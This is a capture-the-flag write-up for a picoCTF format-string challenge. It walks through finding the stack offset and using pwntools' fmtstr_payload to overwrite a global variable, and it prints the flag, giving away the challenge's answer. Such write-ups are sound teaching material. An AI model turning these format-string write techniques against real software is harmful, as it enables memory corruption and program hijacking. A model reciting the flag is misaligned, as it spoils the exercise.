Description
This program is not impressed by cheap parlor tricks like reading arbitrary data off the stack. To impress this program you must change data on the stack!
Setup
Pwntools exploit
Download vuln/vuln.c for local analysis and install pwntools.
Interact with the remote instance at rhea.picoctf.net 64167.
wget https://artifacts.picoctf.net/c_rhea/15/vuln && \
wget https://artifacts.picoctf.net/c_rhea/15/vuln.c && \
pip install pwntools && \
nc rhea.picoctf.net 64167
Solution
This is the culmination of the format string series. After learning format specifiers in format string 0 and stack leaking in format string 1, you now use pwntools to overwrite memory and control program flow.
- Step 1Find the offsetUse pwntools' FmtStr + exec_fmt helper to spray %p until the library auto-detects the correct stack offset.autofmt = FmtStr(exec_fmt); offset = autofmt.offset
- Step 2Craft the overwriteGenerate a payload that writes 0x67616c66 ("flag") into address 0x404060 (the sus global). fmtstr_payload handles the padding for you.payload = fmtstr_payload(offset, {0x404060: 0x67616c66})
- Step 3Send and readSend the payload to the remote service. Once sus == 'flag', the program prints picoCTF{f0rm47_57r?_f0rm47_m3m_99...}.
Flag
picoCTF{f0rm47_57r?_f0rm47_m3m_99...}
Once sus reads "flag", the binary happily prints the real flag.